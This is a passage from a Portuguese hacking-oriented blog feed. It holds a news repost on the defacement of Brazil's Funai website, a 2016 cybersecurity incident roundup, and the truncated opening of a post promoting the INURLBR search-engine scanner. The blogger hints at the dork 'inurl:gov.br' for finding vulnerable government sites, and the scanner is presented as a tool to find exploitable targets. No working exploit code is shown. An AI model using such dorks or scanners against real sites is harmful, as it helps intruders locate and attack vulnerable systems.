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" /><br />
<br />
Outros links para download:<br />
<br />
http://uptobox.com/slv4yz8skuhe<br />
https://1fichier.com/?ia9xf04pso</div>
mrdrawerhttp://www.blogger.com/profile/08233472049860500738noreply@blogger.comtag:blogger.com,1999:blog-4472344379716989945.post-17104069074395431182016-12-26T11:49:00.004-02:002016-12-26T11:56:47.967-02:00Site da Funai é invadido por hacker<div style="border: 0px; box-sizing: border-box; color: #262626; font-stretch: inherit; line-height: inherit; margin-bottom: 0.938rem; padding: 0px; vertical-align: baseline;">
<div style="text-align: justify;">
<span style="font-family: "arial" , "helvetica" , sans-serif;">Verdade.... já havia visto umas semanas atras uma vulnerabilidade via pesquisa no google no site da funai.... (Ta aí... inurl:gov.br)</span></div>
</div>
<div style="border: 0px; box-sizing: border-box; color: #262626; font-stretch: inherit; line-height: inherit; margin-bottom: 0.938rem; padding: 0px; vertical-align: baseline;">
<div style="text-align: justify;">
<br /></div>
</div>
<div style="border: 0px; box-sizing: border-box; color: #262626; font-stretch: inherit; line-height: inherit; margin-bottom: 0.938rem; padding: 0px; vertical-align: baseline;">
<div style="text-align: justify;">
<span style="font-family: "arial" , "helvetica" , sans-serif;">O site da Fundação Nacional do Índio (Funai) foi invadido por um grupo de hackers que se autodenomina “AnonPlus”. Ao menos na tarde deste domingo (25), todas as páginas do portal da autarquia ligada ao Ministério da Justiça estavam fora do ar.</span></div>
</div>
<div style="border: 0px; box-sizing: border-box; color: #262626; font-stretch: inherit; line-height: inherit; margin-bottom: 0.938rem; padding: 0px; vertical-align: baseline;">
<div style="text-align: justify;">
<span style="clear: left; float: left; font-family: "arial" , "helvetica" , sans-serif; margin-bottom: 1em; margin-right: 1em;"><img src="http://cdn.istoe.com.br/wp-content/themes/tema_istoe/assets/svg/logo-istoe-40a-1280.svg" height="60" width="320" /></span></div>
</div>
<div style="border: 0px; box-sizing: border-box; color: #262626; font-stretch: inherit; line-height: inherit; margin-bottom: 0.938rem; padding: 0px; vertical-align: baseline;">
<div style="text-align: justify;">
<span style="font-family: "arial" , "helvetica" , sans-serif;">Os hackers afirmam que nenhuma informação da fundação foi roubada e que o objetivo da ação é somente publicar seu “manifesto” para aqueles que querem defender “a sua liberdade de informação”.</span></div>
</div>
<div style="border: 0px; box-sizing: border-box; color: #262626; font-stretch: inherit; line-height: inherit; margin-bottom: 0.938rem; padding: 0px; vertical-align: baseline;">
<div style="text-align: justify;">
<span style="font-family: "arial" , "helvetica" , sans-serif;">Em texto em inglês, os invasores dizem que “o AnonPlus difunde ideias sem censura” e criticam a mídia. “Fazemos isso para restaurar a dignidade à função da mídia: a mídia deve ser livre, sem censura e deve limitar-se a ‘mostrar o que está acontecendo’ e não ‘dizer-nos o que é errado e o que é certo'”.</span></div>
</div>
<div style="border: 0px; box-sizing: border-box; color: #262626; font-stretch: inherit; line-height: inherit; margin-bottom: 0.938rem; padding: 0px; vertical-align: baseline;">
<div style="text-align: justify;">
<span style="font-family: "arial" , "helvetica" , sans-serif;">A reportagem não conseguiu contato com a Funai. Na semana passada, a fundação divulgou uma nota para criticar publicações de fotos de índios isolados da Amazônia feitas pela revista americana “National Geographic”. Segundo a Funai, a divulgação demonstrou “desrespeito aos povos indígenas isolados ao expor publicamente indígenas que se mantém em isolamento por decisões próprias”.</span></div>
</div>
mrdrawerhttp://www.blogger.com/profile/08233472049860500738noreply@blogger.comtag:blogger.com,1999:blog-4472344379716989945.post-28605667609318223202016-12-22T13:19:00.000-02:002016-12-22T13:19:29.915-02:00Especial: 10 maiores hacks, vazamentos e bugs de cibersegurança de 2016<div style="background-color: white; border: 0px; font-family: Calibri, Arial, sans-serif; font-size: 16px; line-height: 20px; list-style: none; margin-bottom: 20px; outline: none; padding: 0px;">
O ano que está chegando ao fim foi cheio de notícias negativas no universo de cibersegurança.</div>
<div style="background-color: white; border: 0px; font-family: Calibri, Arial, sans-serif; font-size: 16px; line-height: 20px; list-style: none; margin-bottom: 20px; outline: none; padding: 0px;">
<img src="http://idgnow.com.br/idgimages/imagefolder.2016-06-13.1885562171/hacker-625.jpg" /></div>
<div style="background-color: white; border: 0px; font-family: Calibri, Arial, sans-serif; font-size: 16px; line-height: 20px; list-style: none; margin-bottom: 20px; outline: none; padding: 0px;">
O Yahoo revelou dois hacks gigantescos, incluindo o maior vazamento da história. Milhões de DVRs e webcams “zumbificadas” derrubaram a Internet nos EUA. A Rússia foi acusada de tentar influenciar as eleições dos EUA por meio de hacks, e um novo tipo de malware conseguiu ganhar muito dinheiro roubando usuários de Bitcoin.</div>
<div style="background-color: white; border: 0px; font-family: Calibri, Arial, sans-serif; font-size: 16px; line-height: 20px; list-style: none; margin-bottom: 20px; outline: none; padding: 0px;">
<strong style="border: 0px; list-style: none; margin: 0px; outline: none; padding: 0px;">Yahoo em apuros</strong></div>
<div style="background-color: white; border: 0px; font-family: Calibri, Arial, sans-serif; font-size: 16px; line-height: 20px; list-style: none; margin-bottom: 20px; outline: none; padding: 0px;">
Em setembro, o Yahoo chocou o mundo ao revelar que pelo menos 500 milhões de contas dos seus usuários foram invadidas em 2014. Na época, acreditava-se que esse era o maior vazamento de dados pessoais da história da Internet. Mas o Yahoo conseguiu superar o próprio recorde negativo ao revelar em dezembro que um outro hack, ocorrido lá em 2013, vazou os dados de 1 bilhão dos seus usuários.</div>
<div style="background-color: white; border: 0px; font-family: Calibri, Arial, sans-serif; font-size: 16px; line-height: 20px; list-style: none; margin-bottom: 20px; outline: none; padding: 0px;">
<strong style="border: 0px; list-style: none; margin: 0px; outline: none; padding: 0px;">Ransomware em alta</strong></div>
<div style="background-color: white; border: 0px; font-family: Calibri, Arial, sans-serif; font-size: 16px; line-height: 20px; list-style: none; margin-bottom: 20px; outline: none; padding: 0px;">
A ameaça online que definiu 2016 mais do que qualquer outra tem de ser o chamado ransomware. Esse malware criptografa seus arquivos e os toma como reféns, exigindo um pagamento do usuário para liberar os arquivos de volta. Muitas e muitas variações de ransomware tomaram as manchetes em 2016, incluindo ameaças como Locky, DMA Locker, Surprise e uma versão amadora (mas eficaz) chamada Ranscam, que rouba seu dinheiro e ainda assim apaga seus arquivos. Houve até ransomware mobile, e em julho os pesquisadores de segurança descobriram uma versão do Locky que conseguia operar offline para ser ainda mais efetiva. Um estudo publicado em agosto pela Malwarebytes apontava que o ransomware era tão comum que estava atingindo quase metade de todas as empresas dos EUA.</div>
<div style="background-color: white; border: 0px; font-family: Calibri, Arial, sans-serif; font-size: 16px; line-height: 20px; list-style: none; margin-bottom: 20px; outline: none; padding: 0px;">
<strong style="border: 0px; list-style: none; margin: 0px; outline: none; padding: 0px;">DDoS contra Dyn</strong></div>
<div style="background-color: white; border: 0px; font-family: Calibri, Arial, sans-serif; font-size: 16px; line-height: 20px; list-style: none; margin-bottom: 20px; outline: none; padding: 0px;">
Em outubro, uma botnet impulsionou um grande ataque de negação de serviço (DDoS) contra o Dyn, um importante provedor de sistema nomes de domínio (DNS). O DNS é o sistema de direcionamento que transforma um nome de um site como <span class="skimlinks-unlinked" style="border: 0px; list-style: none; margin: 0px; outline: none; padding: 0px;">google.com</span> em um endereço de IP (Protocolo de Internet) como 172.217.21.110 para os computadores lerem. Sem DNS, um navegador web não consegue encontrar o site que você quer acessar - e foi exatamente isso que aconteceu com milhões de usuários dos EUA durante esse ataque DDoS. O acesso a sites como Twitter, GitHub e Netflix ficou indo e voltando durante o dia. Alguns dias depois ficamos sabendo que a botnet que causou todo esse problema consistia em 100 mil aparelhos residenciais (como webcams e DVRs) que tinham sido infectados pelo malware Mirai. Sim, um exército de aparelhos inteligentes “burros e inseguros” atacaram a web.</div>
<div style="background-color: white; border: 0px; font-family: Calibri, Arial, sans-serif; font-size: 16px; line-height: 20px; list-style: none; margin-bottom: 20px; outline: none; padding: 0px;">
<strong style="border: 0px; list-style: none; margin: 0px; outline: none; padding: 0px;">Apple para de liberar patches para o QuickTime</strong></div>
<div style="background-color: white; border: 0px; font-family: Calibri, Arial, sans-serif; font-size: 16px; line-height: 20px; list-style: none; margin-bottom: 20px; outline: none; padding: 0px;">
O QuickTime costumava ser um dos softwares mais onipresentes em um computador. Era algo vital para assistir muitos vídeos antigos, especialmente no iTunes. Com o tempo, no entanto, o QuickTime tornou-se menos e menos importante, e agora é quase desnecessários. Há alguns meses, após serem descobertas duas vulnerabilidades críticas para o software, a Apple aparentemente decidiu “jogar contra” o QuickTime para Windows em vez de corrigir os problemas. Em outras palavras, se você ainda está rodando o QuickTime no Windows já passou da hora de desinstalá-lo.</div>
<div style="background-color: white; border: 0px; font-family: Calibri, Arial, sans-serif; font-size: 16px; line-height: 20px; list-style: none; margin-bottom: 20px; outline: none; padding: 0px;">
<strong style="border: 0px; list-style: none; margin: 0px; outline: none; padding: 0px;">Cartões de crédito</strong></div>
<div style="background-color: white; border: 0px; font-family: Calibri, Arial, sans-serif; font-size: 16px; line-height: 20px; list-style: none; margin-bottom: 20px; outline: none; padding: 0px;">
As medidas de segurança do seu cartão de crédito não são tão seguras quanto você pensa. Pesquisadores de Universidade de Newcastle, no Reino Unido, demonstraram que descobrir a data de expiração e o código CVV de um cartão pode ser algo relativamente simples. Os especialistas mostraram uma maneira de descobrir esses números usando uma técnica chamada “distributed guessing”. Basicamente, um laptop carrega centenas de conjeturas simultaneamente em vários sites de pagamento, usando detalhes de expiração e código CVV do cartão levemente diferentes. Em cerca de seis segundos, você vai encontrar a sequência numérica correta para desbloquear os códigos secretos de um cartão, segundo os pesquisadores. A fraqueza é uma falha em limitar corretamente o número de tentativas de preencher os detalhes de pagamento, e os sistemas de cartão de crédito que não monitoram ativamente em busca de tentativas simultâneas incorretas de inserção de dados de cartão de crédito.</div>
<div style="background-color: white; border: 0px; font-family: Calibri, Arial, sans-serif; font-size: 16px; line-height: 20px; list-style: none; margin-bottom: 20px; outline: none; padding: 0px;">
<strong style="border: 0px; list-style: none; margin: 0px; outline: none; padding: 0px;">Hack contra o Partido Democrata</strong></div>
<div style="background-color: white; border: 0px; font-family: Calibri, Arial, sans-serif; font-size: 16px; line-height: 20px; list-style: none; margin-bottom: 20px; outline: none; padding: 0px;">
Neste ano, os ataques hackers “subiram na vida”, passando de apenas prejudicar empresas e agências do governo para intervir de maneira direta na eleição presidencial dos EUA. O primeiro exemplo disso foi um vazamento da rede de computadores do Comitê Nacional Democrata (DNC). Em julho, o site Wikileaks publicou um grande número de documentos, que incluíam cerca de 20 mil e-mails e milhares de arquivos anexos de membros do comitê.</div>
<div style="background-color: white; border: 0px; font-family: Calibri, Arial, sans-serif; font-size: 16px; line-height: 20px; list-style: none; margin-bottom: 20px; outline: none; padding: 0px;">
Muitos escândalos estouraram depois disso, incluindo implicações de que o Comitê Democrata teria trabalhado contra a campanha do também democrata Bernie Sanders para favorecer a nomeação de Hillary Clinton como a candidata democrata contra Donald Trump. A diretora do comitê, Debbie Wasserman Schultz, acabou tendo de abandonar o cargo por conta das revelações. Um hacker denominado Guccifer 2.0 assumiu a autoria do roubo de dados, mas as agências dos EUA acreditaram que o trabalho tinha sido feito por setores do governo russo.</div>
<div style="background-color: white; border: 0px; font-family: Calibri, Arial, sans-serif; font-size: 16px; line-height: 20px; list-style: none; margin-bottom: 20px; outline: none; padding: 0px;">
<strong style="border: 0px; list-style: none; margin: 0px; outline: none; padding: 0px;">Rússia e eleições dos EUA</strong></div>
<div style="background-color: white; border: 0px; font-family: Calibri, Arial, sans-serif; font-size: 16px; line-height: 20px; list-style: none; margin-bottom: 20px; outline: none; padding: 0px;">
Em setembro, autoridades dos EUA começaram a investigar a possibilidade de a Rússia ter tentado influenciar a eleição presidencial norte-americana. Mais para o final do ano, a CIA, o FBI e outras agências de inteligência dos EUA concluíram com “grande confiança” que a Rússia tentou influenciar de maneira direta as eleições dos EUA com a intenção de beneficiar o vencedor Donald Trump.</div>
<div style="background-color: white; border: 0px; font-family: Calibri, Arial, sans-serif; font-size: 16px; line-height: 20px; list-style: none; margin-bottom: 20px; outline: none; padding: 0px;">
<strong style="border: 0px; list-style: none; margin: 0px; outline: none; padding: 0px;">Apple x FBI</strong></div>
<div style="background-color: white; border: 0px; font-family: Calibri, Arial, sans-serif; font-size: 16px; line-height: 20px; list-style: none; margin-bottom: 20px; outline: none; padding: 0px;">
Em dezembro de 2015, extremistas islâmicos realizaram um ataque terrorista em San Bernardino, na Califórnia, matando 14 pessoas e ferindo seriamente outras 22. Os criminosos depois foram mortos pela polícia em uma troca de tiros.</div>
<div style="background-color: white; border: 0px; font-family: Calibri, Arial, sans-serif; font-size: 16px; line-height: 20px; list-style: none; margin-bottom: 20px; outline: none; padding: 0px;">
Em 2016, um iPhone que pertencia a um dos terroristas dominou as manchetes porque o FBI queria que a Apple criasse um software especial para permitir que seus investigadores invadissem o smartphone, que estava bloqueado. A Apple se negou a fazer isso, argumentando que o que o FBI realmente queria que a empresa fizesse era criar um “malware customizado” para burlar os recursos de segurança da própria companhia.</div>
<div style="background-color: white; border: 0px; font-family: Calibri, Arial, sans-serif; font-size: 16px; line-height: 20px; list-style: none; margin-bottom: 20px; outline: none; padding: 0px;">
O FBI eventualmente retirou o pedido depois que uma empresa de segurança conseguiu ajudar o órgão a acessar os dados no aparelho. O legado do caso continua vivo à medida que legisladores consideram qual tipo de ajuda as empresas de tecnologia devem fornecer às autoridades.</div>
<div style="background-color: white; border: 0px; font-family: Calibri, Arial, sans-serif; font-size: 16px; line-height: 20px; list-style: none; margin-bottom: 20px; outline: none; padding: 0px;">
<strong style="border: 0px; list-style: none; margin: 0px; outline: none; padding: 0px;">NSA hackeada</strong></div>
<div style="background-color: white; border: 0px; font-family: Calibri, Arial, sans-serif; font-size: 16px; line-height: 20px; list-style: none; margin-bottom: 20px; outline: none; padding: 0px;">
Em agosto, um grupo hacker anônimo chamado Shadow Brokers afirmou que tinha obtido as ferramentas de hacking da Equation Group, uma equipe de ciberespionagem relacionada à Agência Nacional de Segurança dos EUA, a NSA. Durante a invasão, os hackers conseguiram colocar as mãos em exploits sofisticadas que teriam sido usadas pela NSA. Após revelar uma pequena parte desse tesouro, o Shadow Brokers tentou vender as ferramentas na Internet, mas até outubro tinha conseguido gerar pouco interesse com tal oferta.</div>
mrdrawerhttp://www.blogger.com/profile/08233472049860500738noreply@blogger.comtag:blogger.com,1999:blog-4472344379716989945.post-46578556816792093522016-12-15T16:22:00.000-02:002016-12-15T16:54:16.687-02:00SCANNER - INURLBR - SCANNER - INURL<a href="https://www.blogger.com/blogger.g?blogID=4472344379716989945" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="https://www.blogger.com/blogger.g?blogID=4472344379716989945" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><span style="font-family: "arial" , "helvetica" , sans-serif;"><br /><br />SCANNER - INURLBR<br /><br /><br />===============<br /><br /><br /><br /> <br /> <br /><br /><br /><br /> <br /><br /><br /><br />>Advanced search in search engines, enables analysis provided to exploit GET / POST capturing emails & urls, with an internal custom validation junction for each target / url found.<br /><br /><br /><br />```<br /><br /><br /><br /> +-----------------------------------------------------------------------------+<br /><br /><br /><br /><a href="https://www.blogger.com/blogger.g?blogID=4472344379716989945"></a><a href="https://www.blogger.com/blogger.g?blogID=4472344379716989945"></a> | [!] Legal disclaimer: Usage of INURLBR for attacking targets without prior |<br /><br /><br /><br /> | mutual consent is illegal. |<br /><br /><br /><br /> | It is the end user's responsibility to obey all applicable local, state and|<br /><br /><br /><br /> | federal laws. |<br /><br /><br /><br /> | Developers assume no liability and are not responsible for any misuse or |<br /><br /><br /><br /> | damage caused by this program |<br /><br /><br /><br /> +-----------------------------------------------------------------------------+<br /><br /><br /><br />```<br /><br /><br /><br /><br /> <br /><br /><br /><br /><br /> <br /><br /><br /><br />```<br /><br /><br /><br /> [+] AUTOR: Cleiton Pinheiro / Nick: googleINURL<br /><br /><br /><br /> [+] EMAIL: inurlbr@gmail.com<br /><br /><br /><br /> [+] Blog: http://blog.inurl.com.br<br /><br /><br /><br /> [+] Twitter: https://twitter.com/googleinurl<br /><br /><br /><br /> [+] Fanpage: https://fb.com/InurlBrasil<br /><br /><br /><br /> [+] Pastebin http://pastebin.com/u/Googleinurl<br /><br /><br /><br /> [+] GIT: https://github.com/googleinurl<br /><br /><br /><br /> [+] PSS: http://packetstormsecurity.com/user/googleinurl<br /><br /><br /><br /> [+] EXA: http://exploit4arab.net/author/248/Cleiton_Pinheiro<br /><br /><br /><br /> [+] YOUTUBE: http://youtube.com/c/INURLBrasil<br /><br /><br /><br /> [+] PLUS: http://google.com/+INURLBrasil<br /><br /><br /><br />```<br /><br /><br /><br /><br /> <br /><br /><br /><br /> * GROUP INURL BRASIL - ADVANCED SEARCH.<br /><br /><br /><br /> * SCRIPT NAME: INURLBR<br /><br /><br /><br /> * Codename: Subversive<br /><br /><br /><br /> * Version: 2.1.0<br /><br /><br /><br /><br /> <br /><br /><br /><br /><br /> <br /><br /><br /><br />- Screenshot:<br /><br /><br /><br />------<br /><br /><br /><br />![Screenshot](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgx9bV5au-_h0OiQ9ruEH9v882GPLO7OjJwSvpv3SMffYszNwqq3MQDV7x5yQa3LiRLaFePjKIGFRsWacmUY-KIULHLtZ1k3da-lXourQ9TO0Aiwdf8wPQZ-PpZ3gKZaqAK9KKuiQOO5krb/s1600/inurlbr.png)<br /><br /><br /><br /><br /> <br /><br /><br /><br />- LIB & 